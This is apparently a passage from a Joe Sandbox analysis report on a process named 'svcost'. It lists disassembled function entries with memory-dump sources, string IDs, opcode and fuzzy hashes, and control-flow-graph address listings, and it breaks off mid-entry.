                                                                                                • Opcode ID: c45c7a10098453b636bef80c5a23b3ae97339983aab9ebfff86774090719a19e
                                                                                                • Instruction ID: 29ab97c09b91cd69e6af0e8c3f9524954c55532d94d927ca87d7de68f651c3f0
                                                                                                • Opcode Fuzzy Hash: c45c7a10098453b636bef80c5a23b3ae97339983aab9ebfff86774090719a19e
                                                                                                • Instruction Fuzzy Hash: 6952C574A146288FCB65DF28CD84B9AB7B5FB89301F5081E9D90DA7355DB30AE81CF50
                                                                                                Function 0432C020 Relevance: 3.7, Strings: 2, Instructions: 1177COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4
                                                                                                • API String ID: 0-2717623955
                                                                                                • Opcode ID: 536cb7ee6e54f8636a2c90c58499f3f9ad697537921bcf1f7e1bffd73dc6846c
                                                                                                • Instruction ID: 1342e8f16142b66f1472991cfec3a1aa2b668b9c9ebda1be8ed6367ae418bf2a
                                                                                                • Opcode Fuzzy Hash: 536cb7ee6e54f8636a2c90c58499f3f9ad697537921bcf1f7e1bffd73dc6846c
                                                                                                • Instruction Fuzzy Hash: B0B21634A00228DFDB14DFA4C994BADB7B6FF88700F1595A9E505AB3A5DB70AC81CF50
                                                                                                Function 0432C347 Relevance: 3.0, Strings: 2, Instructions: 495COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4
                                                                                                • API String ID: 0-2717623955
                                                                                                • Opcode ID: 77b1662bb3f297d80928f67964c786c19ac9481222de4ce08bc130d0fe3863dd
                                                                                                • Instruction ID: 39b3fee483bd826b11c9588f4246d91cc40014d5d63a233132fe890666aad4f0
                                                                                                • Opcode Fuzzy Hash: 77b1662bb3f297d80928f67964c786c19ac9481222de4ce08bc130d0fe3863dd
                                                                                                • Instruction Fuzzy Hash: DA220B34A00628CFDB24DF64C994BADB7B6FF48300F1591A9E509AB3A5DB70AD81CF50
                                                                                                Function 00C274FF Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 971bab5e61910a736fffafc78e2c39741599cdf9f5bab0c86394f35fa037db01
                                                                                                • Instruction ID: 56d8ac96024adf93bb0edc1174d680225900c90150ebbf2f350a63c903a4dd48
                                                                                                • Opcode Fuzzy Hash: 971bab5e61910a736fffafc78e2c39741599cdf9f5bab0c86394f35fa037db01
                                                                                                • Instruction Fuzzy Hash: 26E14674E09218CFDB50DFA9D884B9DBBF1FB49310F1091AAE419AB695DB315E85CF00
                                                                                                Function 00C4D500 Relevance: .2, Instructions: 247COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0bb938009880168a10014afb93ee2a02a1ceab4de68792b13a955b7f1e82034
                                                                                                • Instruction ID: 1f47d05966f8551ca12381816200b223d72aad38d347a1d4b386a4a66f90ea07
                                                                                                • Opcode Fuzzy Hash: b0bb938009880168a10014afb93ee2a02a1ceab4de68792b13a955b7f1e82034
                                                                                                • Instruction Fuzzy Hash: 09B10A74E05218CFDB14EFAAD984BADBBF6FF89314F218069E41AA7255DB305985CF00
                                                                                                Function 00C4D4F0 Relevance: .2, Instructions: 241COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2893a583fb3f1f30b70d3402b6499c5eca93f9b9c6494138b44187af7821879c
                                                                                                • Instruction ID: 167ed62d65f9a772708f730e67dc718b88098ca9888d09ddd3cf4add27bdfd6c
                                                                                                • Opcode Fuzzy Hash: 2893a583fb3f1f30b70d3402b6499c5eca93f9b9c6494138b44187af7821879c
                                                                                                • Instruction Fuzzy Hash: DCB1F9B4E05218CFDB14EFAAD984B9DBBF6FF89314F208069E41AA7255DB305985CF00
                                                                                                Function 00C4C858 Relevance: .2, Instructions: 209COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 50ee7e98c5c0910d78d6f5278f94712af53b8ba080b06f78655dd22f1e02da89
                                                                                                • Instruction ID: 5172565447ec43cc4c4af4e1a2f35095dbef4ae7529b60b0db8fd6e2543eb3c9
                                                                                                • Opcode Fuzzy Hash: 50ee7e98c5c0910d78d6f5278f94712af53b8ba080b06f78655dd22f1e02da89
                                                                                                • Instruction Fuzzy Hash: B2912A74E06218CFEB94CF6AD9D4BADBBF2FB49314F2080A9D019A7261D7745984DF40
                                                                                                Function 00C4C848 Relevance: .2, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fc2cd792a215eda44c6191bc03190e44f2512548c6b8375231be85071f412c67
                                                                                                • Instruction ID: 28be91d7b8ced8f4d9efc812110156d56d9861ccaec9abf84350efbf1d5cf49d
                                                                                                • Opcode Fuzzy Hash: fc2cd792a215eda44c6191bc03190e44f2512548c6b8375231be85071f412c67
                                                                                                • Instruction Fuzzy Hash: 8E913974E06218CFEB64CF6AD994BADBBF2FF49314F2080A9D018A7261D7745A85CF40
                                                                                                Function 00318A00 Relevance: .2, Instructions: 170COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4515a9d9aea02298bd2859ddf7e5a0ce26f2ebe5dc641a1c9079bb9c461e374f
                                                                                                • Instruction ID: dd0eb0f6cb4e82eb25b92435580560717f1f76100b3c658d265b5b18c5db75de
                                                                                                • Opcode Fuzzy Hash: 4515a9d9aea02298bd2859ddf7e5a0ce26f2ebe5dc641a1c9079bb9c461e374f
                                                                                                • Instruction Fuzzy Hash: DF711CB1E056459FD708EFAAE895A9EBFF6BF88310F04C53AD40497268EB705906CF41
                                                                                                Function 00318A10 Relevance: .2, Instructions: 165COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e56a152fcdcc529cb6372283aa1c00ba502100770659efc91ebafa2e6b20742d
                                                                                                • Instruction ID: 176e0ed049f1274bfc94a6416939ce932e0b5c2beb1a611a1e005fe6eb0b2b16
                                                                                                • Opcode Fuzzy Hash: e56a152fcdcc529cb6372283aa1c00ba502100770659efc91ebafa2e6b20742d
                                                                                                • Instruction Fuzzy Hash: 41712CB1E046458FD708EFAAE895A9EBBF6FF88310F04C53AD40497268EF7058068F41
                                                                                                Function 0031E3D8 Relevance: 6.6, Strings: 5, Instructions: 361COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 486 31e3d8-31e400 488 31e406-31e40a 486->488 489 31e4ec 486->489 490 31e40c-31e418 488->490 491 31e41e-31e422 488->491 492 31e4f4-31e511 489->492 490->491 496 31e518-31e53c 490->496 493 31e543 491->493 494 31e428-31e43f 491->494 492->496 497 31e549 493->497 509 31e441-31e44d 494->509 510 31e453-31e457 494->510 496->493 500 31e596-31e599 497->500 501 31e54b-31e560 497->501 502 31e567 500->502 503 31e59a-31e5a9 500->503 501->502 502->492 511 31e568-31e569 502->511 503->497 507 31e5ab-31e5c2 503->507 512 31e5c4-31e5e4 507->512 513 31e5fa-31e61f 507->513 509->510 518 31e56f-31e593 509->518 514 31e483-31e49c 510->514 515 31e459-31e472 call 3101b0 510->515 511->518 539 31e626-31e67a 512->539 540 31e5e6-31e5f7 512->540 513->539 531 31e4c5-31e4e9 514->531 532 31e49e-31e4c2 514->532 515->514 530 31e474-31e477 515->530 518->500 537 31e480 530->537 537->514 548 31e721-31e76f 539->548 549 31e680-31e68c 539->549 561 31e771-31e795 548->561 562 31e79f-31e7a5 548->562 552 31e696-31e6aa 549->552 553 31e68e-31e695 549->553 556 31e719-31e720 552->556 557 31e6ac-31e6d1 552->557 568 31e6d3-31e6ed 557->568 569 31e714-31e717 557->569 561->562 563 31e797 561->563 564 31e7b7-31e7c6 562->564 565 31e7a7-31e7b4 562->565 563->562 568->569 571 31e6ef-31e6f8 568->571 569->556 569->557 572 31e707-31e713 571->572 573 31e6fa-31e6fd 571->573 573->572
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                                • API String ID: 0-3955841951
                                                                                                • Opcode ID: b67885684228a3ae163839ef7557a9b115ede078f66d2c52f2c508a6a3bd0406
                                                                                                • Instruction ID: 8cb2dc75080105859176dd00536632ea4bcbf844734f52d66dcd7bc730050764
                                                                                                • Opcode Fuzzy Hash: b67885684228a3ae163839ef7557a9b115ede078f66d2c52f2c508a6a3bd0406
                                                                                                • Instruction Fuzzy Hash: 67C157363143514FDB19DF69D850AAE7BA2EF88314B29417AE805CB3A6CE35DC42C7A1
                                                                                                Function 00C46992 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1105 c46992-c4699e 1106 c47734-c47764 1105->1106 1107 c469a4-c469c9 1105->1107 1116 c483ae-c48412 call c45418 call c42ed8 call c454b0 1106->1116 1117 c4776a-c4778f call c45708 1106->1117 1110 c46937-c4693f 1107->1110 1111 c469cf-c469d7 1107->1111 1113 c46941-c4803d 1110->1113 1114 c46948-c474e4 1110->1114 1111->1110 1113->1110 1127 c48043-c4804b 1113->1127 1118 c475dc-c475ec 1114->1118 1119 c474ea-c474f2 1114->1119 1133 c48967-c48996 call c45418 call 5415c30 1116->1133 1134 c48418-c48420 1116->1134 1117->1110 1125 c47795-c4779d 1117->1125 1118->1110 1119->1110 1119->1118 1125->1110 1127->1110 1137 c4899b-c489c8 call c45708 1133->1137 1134->1110 1137->1110 1141 c489ce-c489d6 1137->1141 1141->1110
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$^$`Xh
                                                                                                • API String ID: 0-2736043617
                                                                                                • Opcode ID: 369a1ed3f603e2fc91d817a9476df25d0bb3a3212cce908bf5bd539888e36ffd
                                                                                                • Instruction ID: 001d973c5dae153eb1ca10d70051e1cb27231ab53d0ecbe31dff6504b39e28e7
                                                                                                • Opcode Fuzzy Hash: 369a1ed3f603e2fc91d817a9476df25d0bb3a3212cce908bf5bd539888e36ffd
                                                                                                • Instruction Fuzzy Hash: 3241EFB4901268CFDB20EFA1C888BDDBBB1BB49311F2441A9D409BB298CB745EC5DF54
                                                                                                Function 05400347 Relevance: 3.8, Strings: 3, Instructions: 83COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1143 5400347-5400363 1145 540a369-540a42d 1143->1145 1146 5400369-5400391 1143->1146 1176 540a433 call c4b928 1145->1176 1177 540a433 call c4b938 1145->1177 1149 5400106-5400111 1146->1149 1150 5400397-54003a2 1146->1150 1151 5400113-5404517 1149->1151 1152 540011a-5414010 1149->1152 1150->1149 1151->1149 1169 540451d-5404528 1151->1169 1152->1149 1169->1149 1171 540a439-540a446 1172 540a44c-540a457 1171->1172 1173 540937e-5409399 1171->1173 1174 54093ab-54093bf 1173->1174 1175 540939b-54093a1 1173->1175 1174->1145 1175->1174 1176->1171 1177->1171
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <`:$T$`Xh
                                                                                                • API String ID: 0-4124483227
                                                                                                • Opcode ID: b23cd9dd278de1fe55542f8ab86b92af84422b51a7898ae07103b5e6f4183fb1
                                                                                                • Instruction ID: 9f09e054d6cbbce1ec082ff34a9145a009ea058f9f6cff3355ad12d72b503c1b
                                                                                                • Opcode Fuzzy Hash: b23cd9dd278de1fe55542f8ab86b92af84422b51a7898ae07103b5e6f4183fb1
                                                                                                • Instruction Fuzzy Hash: 8F410274A092288FCB64DF58C988AEABBF1FF49300F1041EAE949A7391C7745E918F01
                                                                                                Function 00C2A43C Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1178 c2a43c-c2a460 1193 c2a466 call c2ba40 1178->1193 1194 c2a466 call c2ba50 1178->1194 1180 c2a46c-c2a4a9 1181 c2a1f2-c2a1fb 1180->1181 1182 c2a4af-c2a4ba 1180->1182 1183 c2a204-c2b2d4 1181->1183 1184 c2a1fd 1181->1184 1182->1181 1183->1181 1190 c2b2da-c2b2e5 1183->1190 1186 c2a191-c2a1da 1184->1186 1187 c2a187-c2a18e 1184->1187 1186->1181 1192 c2a1dc-c2a1e7 1186->1192 1190->1181 1192->1181 1193->1180 1194->1180
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$/$`Xh
                                                                                                • API String ID: 0-3656810642
                                                                                                • Opcode ID: 2c94494f5b215b90001ccbd1a0e828fefe2806a5780514c006365916ab7fd9a2
                                                                                                • Instruction ID: f85a66a1ae2c4be1f58d0b5aa2058e8acbb3a35a5133427e86b2e0faecc2103f
                                                                                                • Opcode Fuzzy Hash: 2c94494f5b215b90001ccbd1a0e828fefe2806a5780514c006365916ab7fd9a2
                                                                                                • Instruction Fuzzy Hash: CF2113749002A9CBCB21DF58D884BDDB7B1FB49324F0085AAE909B7650C7316ED5CF80
                                                                                                Function 0432261E Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1195 432261e-4322623 call 43252a5 1198 4322629-4322634 1195->1198 1199 432433e-4324354 1195->1199 1200 432014a-4320155 1198->1200 1205 432435c-4324405 1199->1205 1202 4320157-43204c3 1200->1202 1203 432015e-4320e70 1200->1203 1202->1200 1211 43204c9-43204d4 1202->1211 1206 4320e72 1203->1206 1207 4320e77-4320e85 1203->1207 1205->1200 1217 432440b-4324416 1205->1217 1206->1207 1207->1200 1211->1200 1217->1200
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0:$"$(
                                                                                                • API String ID: 0-1845404371
                                                                                                • Opcode ID: a384795cb91976c8bbc70007c6cf395581de54819e3faa2ef2c4b767a2bd9c61
                                                                                                • Instruction ID: ec31008969d654cb09b0925f985e569bcb0830a8c7352127c40e04c000fdc238
                                                                                                • Opcode Fuzzy Hash: a384795cb91976c8bbc70007c6cf395581de54819e3faa2ef2c4b767a2bd9c61
                                                                                                • Instruction Fuzzy Hash: F2219574A012288FDB65DF24D954BDABBF5BF4A300F4051E9E50EA7260DB306E84CF41
                                                                                                Function 00C42F18 Relevance: 3.8, Strings: 3, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1218 c42f18-c42f38 1220 c42f3f-c42f44 1218->1220 1221 c42f3a 1218->1221 1223 c42f4e-c42f56 call 31cad8 1220->1223 1221->1220 1224 c42f5b-c42f5f 1223->1224
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$>$:
                                                                                                • API String ID: 0-3988283215
                                                                                                • Opcode ID: e11d957deda80b63ae37031e017d564d404e676c2141b37ac0587983808c2744
                                                                                                • Instruction ID: e3ed071cb3ddda050f5a3345bd0ddb3d942378eaa2b9585b490946db537ea49f
                                                                                                • Opcode Fuzzy Hash: e11d957deda80b63ae37031e017d564d404e676c2141b37ac0587983808c2744
                                                                                                • Instruction Fuzzy Hash: 18E0D83080628C9FD702EBB4C921B5E7BA9DF07340F4001F2E848C72A0E9310E54CB92
                                                                                                Function 0031FAC8 Relevance: 2.9, Strings: 2, Instructions: 353COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1862 31fac8-31fada 1863 31fb04-31fb08 1862->1863 1864 31fadc-31fafd 1862->1864 1865 31fb14-31fb23 1863->1865 1866 31fb0a-31fb0c 1863->1866 1864->1863 1868 31fb25 1865->1868 1869 31fb2f-31fb5b 1865->1869 1866->1865 1868->1869 1872 31fb61-31fb67 1869->1872 1873 31fd88-31fdcf 1869->1873 1874 31fc39-31fc3d 1872->1874 1875 31fb6d-31fb73 1872->1875 1902 31fdd1 1873->1902 1903 31fde5-31fdf1 1873->1903 1878 31fc60-31fc69 1874->1878 1879 31fc3f-31fc48 1874->1879 1875->1873 1877 31fb79-31fb86 1875->1877 1881 31fc18-31fc21 1877->1881 1882 31fb8c-31fb95 1877->1882 1884 31fc6b-31fc8b 1878->1884 1885 31fc8e-31fc91 1878->1885 1879->1873 1883 31fc4e-31fc5e 1879->1883 1881->1873 1886 31fc27-31fc33 1881->1886 1882->1873 1887 31fb9b-31fbb3 1882->1887 1888 31fc94-31fc9a 1883->1888 1884->1885 1885->1888 1886->1874 1886->1875 1891 31fbb5 1887->1891 1892 31fbbf-31fbd1 1887->1892 1888->1873 1890 31fca0-31fcb3 1888->1890 1890->1873 1894 31fcb9-31fcc9 1890->1894 1891->1892 1892->1881 1901 31fbd3-31fbd9 1892->1901 1894->1873 1896 31fccf-31fcdc 1894->1896 1896->1873 1900 31fce2-31fcf7 1896->1900 1900->1873 1913 31fcfd-31fd20 1900->1913 1904 31fbe5-31fbeb 1901->1904 1905 31fbdb 1901->1905 1907 31fdd4-31fdd6 1902->1907 1909 31fdf3 1903->1909 1910 31fdfd-31fe19 1903->1910 1904->1873 1906 31fbf1-31fc15 1904->1906 1905->1904 1911 31fdd8-31fde3 1907->1911 1912 31fe1a-31fe47 1907->1912 1909->1910 1911->1903 1911->1907 1923 31fe49-31fe4f 1912->1923 1924 31fe5f-31fe61 1912->1924 1913->1873 1918 31fd22-31fd2d 1913->1918 1921 31fd2f-31fd39 1918->1921 1922 31fd7e-31fd85 1918->1922 1921->1922 1929 31fd3b-31fd51 1921->1929 1925 31fe51 1923->1925 1926 31fe53-31fe55 1923->1926 1928 31fe69-31fe6d 1924->1928 1925->1924 1926->1924 1930 31feb8-31fec8 1928->1930 1931 31fe6f-31fe86 1928->1931 1933 31fd53 1929->1933 1934 31fd5d-31fd76 1929->1934 1931->1930 1939 31fe88-31fe92 1931->1939 1933->1934 1934->1922 1942 31fea5-31feb5 1939->1942 1943 31fe94-31fea3 1939->1943 1943->1942
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$d
                                                                                                • API String ID: 0-1322973597
                                                                                                • Opcode ID: 21d5dc952a9965bf5b58b1ba675878a6d472cdab29433cfddbaec131560b95b1
                                                                                                • Instruction ID: f3034f96ecd871e094a2d315788c045b513c5d541eab7fdcd2fdea96c55061ca
                                                                                                • Opcode Fuzzy Hash: 21d5dc952a9965bf5b58b1ba675878a6d472cdab29433cfddbaec131560b95b1
                                                                                                • Instruction Fuzzy Hash: A0D18B346007058FCB29DF29D4949AAB7F2FF89310B16C969D45A8B365DB30FC86CB90
                                                                                                Function 00C23507 Relevance: 2.8, Strings: 2, Instructions: 277COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1947 c23507-c23508 1948 c2350a-c2353f 1947->1948 1949 c2348d-c234bb 1947->1949 1956 c23542-c23548 1948->1956 1954 c234c2-c234ce 1949->1954 1955 c234bd 1949->1955 1972 c234d3-c234d7 1954->1972 1955->1954 1957 c23551-c23552 1956->1957 1958 c2354a 1956->1958 1971 c2357e-c235fa call c231f0 1957->1971 1958->1957 1960 c236e2-c2382a call c231f0 * 2 1958->1960 1961 c236a0-c236c5 1958->1961 1962 c23621-c23622 1958->1962 1963 c23687 1958->1963 1964 c23627-c2362b 1958->1964 1965 c23684-c236c7 1958->1965 1966 c2368d-c23691 1958->1966 1967 c238f1-c238f2 1958->1967 1968 c23576-c2357d 1958->1968 1969 c23554-c2356c 1958->1969 1970 c2363b-c2365d 1958->1970 1958->1971 2008 c2384c-c23871 1960->2008 2009 c2382c-c23891 1960->2009 1980 c236ce-c236dd 1961->1980 1962->1968 1963->1966 1964->1960 1973 c23631-c23639 1964->1973 1965->1980 1966->1970 1975 c23693-c2369b 1966->1975 1969->1956 1976 c2356e-c23574 1969->1976 1970->1961 1992 c2365f-c23678 1970->1992 1977 c2360c-c23612 1971->1977 1998 c235fc-c23604 1971->1998 1973->1977 1975->1977 1976->1956 1986 c23614 1977->1986 1987 c2361b-c2361c 1977->1987 1980->1977 1986->1960 1986->1961 1986->1962 1986->1963 1986->1964 1986->1965 1986->1966 1986->1967 1986->1970 1986->1987 1987->1967 1992->1977 1994 c2367a-c23682 1992->1994 1994->1977 1998->1977 2011 c23898-c238e0 2008->2011 2009->2011 2011->1977 2014 c238e6-c238ec 2011->2014 2014->1977
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$`Xh
                                                                                                • API String ID: 0-3361563179
                                                                                                • Opcode ID: 9926f7289be940f67ed34cf1480ea036fff07e69cece20006fe3da5b92eb8c9c
                                                                                                • Instruction ID: 5d9b40c8b19271f4f5114f2a260cbd5ff9d5b34edfd585baec4b5b3d7b6321af
                                                                                                • Opcode Fuzzy Hash: 9926f7289be940f67ed34cf1480ea036fff07e69cece20006fe3da5b92eb8c9c
                                                                                                • Instruction Fuzzy Hash: D6C13874E09268DFCB11DFA9D884B9DBBB5FB49310F1080AAE409AB755DB349E85CF00
                                                                                                Function 00C4FA2B Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh$|*6
                                                                                                • API String ID: 0-3930423001
                                                                                                • Opcode ID: cc97ef1af5fdf070fdc7d6b8fc742486afa7744366046af5d15f1b7324b8180c
                                                                                                • Instruction ID: 3c9dc0467255a64ed9ddbaa5cb64cafceffaaf5567767fa1c2a77a8191830cf2
                                                                                                • Opcode Fuzzy Hash: cc97ef1af5fdf070fdc7d6b8fc742486afa7744366046af5d15f1b7324b8180c
                                                                                                • Instruction Fuzzy Hash: D7B11374E04218CFDB54DFA5D994BADBBF2FB49314F1080ADE419AB295CB306A86CF01
                                                                                                Function 0432D939 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$H!p
                                                                                                • API String ID: 0-1960402415
                                                                                                • Opcode ID: 6849b5f58ab4922b180ac5535dffb03299333f3bb9f7dbee96b7a40c4ca20530
                                                                                                • Instruction ID: 9f7a6d50fcc39d4eae59efa899eaa4169c88fe755a672ca219b9d0acafb7b5ad
                                                                                                • Opcode Fuzzy Hash: 6849b5f58ab4922b180ac5535dffb03299333f3bb9f7dbee96b7a40c4ca20530
                                                                                                • Instruction Fuzzy Hash: 655199313183109FD729AF34D865A2E7BB2EFC5314B25456EE506CB3A5CE31AC06CBA1
                                                                                                Function 00C42BF8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$`Xh
                                                                                                • API String ID: 0-2970583535
                                                                                                • Opcode ID: 6997ec0a49af52924a4b09f31e4c717521c5080ed522df0c05c5a83593a01026
                                                                                                • Instruction ID: ae51cd2a58d336b628de2054f468e397c7f4754657db3d244d88b9d2e309b096
                                                                                                • Opcode Fuzzy Hash: 6997ec0a49af52924a4b09f31e4c717521c5080ed522df0c05c5a83593a01026
